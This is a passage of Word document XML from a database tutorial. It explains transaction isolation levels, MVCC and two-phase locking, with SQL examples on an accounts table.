            <w:r w:rsidRPr="00EF2B0F">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
              </w:rPr>
              <w:t>✗</w:t>
            </w:r>
            <w:r w:rsidRPr="00EF2B0F">
              <w:t xml:space="preserve"> Possible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3E2795" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:t>Fast</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w14:paraId="00E2A43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440578" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:t>Repeatable Read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929473" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:t>✓ Prevented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55E108" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:t>✓ Prevented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A6E744" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
              </w:rPr>
              <w:t>✗</w:t>
            </w:r>
            <w:r w:rsidRPr="00EF2B0F">
              <w:t xml:space="preserve"> Possible*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03032E" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:t>✓ Prevented*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9DCFA1" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
              </w:rPr>
              <w:t>✗</w:t>
            </w:r>
            <w:r w:rsidRPr="00EF2B0F">
              <w:t xml:space="preserve"> Possible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333E1D" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:t>Moderate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w14:paraId="5E88B25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C2CF57" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:t>Serializable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98EBA9" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:t>✓ Prevented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959A6E" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:t>✓ Prevented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526313" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:t>✓ Prevented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AFA624" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:t>✓ Prevented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85B5E7" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:t>✓ Prevented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A03E74" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:t>Slowest</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3D2DC6E3" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>*PostgreSQL's Repeatable Read actually prevents phantoms (uses MVCC snapshot), and prevents lost updates. MySQL InnoDB's Repeatable Read does not prevent phantom reads in all cases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2033B6CD" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.4 Isolation Level Implementations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF8A31F" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Read Committed (PostgreSQL default, Oracle default):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F96D57F" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48893F14" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Implementation: Each STATEMENT sees the latest committed data as of the statement's start.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5445C937" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="144532DA" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>T1: BEGIN;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBC8FF1" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>T1: SELECT balance FROM accounts WHERE id = 'Alice';  → 500 (snapshot at statement start)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EAD39E" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>T2: UPDATE accounts SET balance = 400 WHERE id = 'Alice'; COMMIT;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC4F751" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:lastRenderedPageBreak/>
        <w:t>T1: SELECT balance FROM accounts WHERE id = 'Alice';  → 400 (new statement, new snapshot)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B50AAA1" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="70AEB1E9" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Each SELECT gets a fresh snapshot. Committed changes from other transactions are visible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EC2629" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>between statements (but not mid-statement).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1680F01A" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Repeatable Read / Snapshot Isolation (PostgreSQL RR, MySQL InnoDB RR):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B87DD00" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563634BF" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Implementation: Transaction sees a SNAPSHOT of the database as of transaction start.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78926504" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">All reads within the transaction see the same consistent snapshot — regardless of </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233A3E4B" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>concurrent commits by other transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C749632" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="6FB2B28F" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>T1: BEGIN;  (snapshot taken at this point — sees all data committed before this moment)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35791335" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>T1: SELECT balance FROM accounts WHERE id = 'Alice';  → 500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E2AA74" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>T2: UPDATE accounts SET balance = 400 WHERE id = 'Alice'; COMMIT;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B1E196" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>T1: SELECT balance FROM accounts WHERE id = 'Alice';  → 500 (still! snapshot unchanged)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D27E8DF" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>T1: COMMIT;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1D8CE4" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="7BB2C8C3" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>T1 sees a frozen-in-time view. No non-repeatable reads. No phantoms (in PostgreSQL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CCDB0D" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Concurrent commits are invisible to T1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FC3F18" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Serializable (strongest — PostgreSQL SSI, MySQL Serializable):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150D2622" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347C927C" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Implementation varies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0C785D" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - True serial execution (single thread — VoltDB, Redis)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B724F0B" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - Two-Phase Locking (2PL) (MySQL with SERIALIZABLE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4F28DF" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - Serializable Snapshot Isolation (SSI) (PostgreSQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DFBE9E" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - Optimistic Concurrency Control (OCC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A07171" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="462CBED0" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Guarantee: Result is equivalent to SOME serial ordering of all transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA10555" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  If T1 and T2 run concurrently, the result is the same as either:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65566A90" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">    T1 then T2, or T2 then T1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F430A9A" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  The database enforces this (aborting one if conflict detected).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FA8C31" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.5 How Isolation Is Implemented — Mechanisms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE0E9E6" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Multi-Version Concurrency Control (MVCC):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E79FBF1" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C308DF" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Core idea: Keep MULTIPLE VERSIONS of each row.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D380EF5" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Each write creates a NEW version (old version preserved).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA28C78" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Readers see the version appropriate for their snapshot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F3ABAB" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Writers create new versions without blocking readers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070D6AF5" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="28CCF672" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>PostgreSQL MVCC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A174B27" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Each row has:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAB0BE8" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">    xmin: transaction ID that created this version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF49CF9" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">    xmax: transaction ID that deleted/replaced this version (0 if current)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2936C032" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3477F96F" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Row: (xmin=100, xmax=105, data="Alice, balance=500")  ← visible to txns 100-104</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A8E4CC" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Row: (xmin=105, xmax=0,   data="Alice, balance=400")  ← visible to txns 105+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5E5F44" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="4279A8F7" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Transaction 103 sees: balance=500 (its snapshot is before txn 105)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5053EFD6" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Transaction 107 sees: balance=400 (its snapshot is after txn 105)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F24B1FE" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="7DCD4186" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  READERS NEVER BLOCK WRITERS. WRITERS NEVER BLOCK READERS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4657B33B" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Only writer-writer conflicts need coordination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D83BA86" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Two-Phase Locking (2PL):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31976339" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C6528F" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Traditional locking protocol:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E59EB0D" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Phase 1 (Growing): Acquire locks (never release).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9B26EA" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Phase 2 (Shrinking): Release locks (never acquire).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D30CD01" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14356BB8" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Read lock (shared): Multiple transactions can hold simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607228D7" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Write lock (exclusive): Only one transaction can hold.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1695A663" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="061CD51F" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  T1 wants to read row X: acquire shared lock on X.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B28BFBC" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  T2 wants to write row X: must acquire exclusive lock → BLOCKED until T1 releases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05504EFD" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F30285" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Ensures serializability but:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B49484" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - Readers block writers (performance impact)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB24A86" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - Writers block readers (latency impact)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E19D7E" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
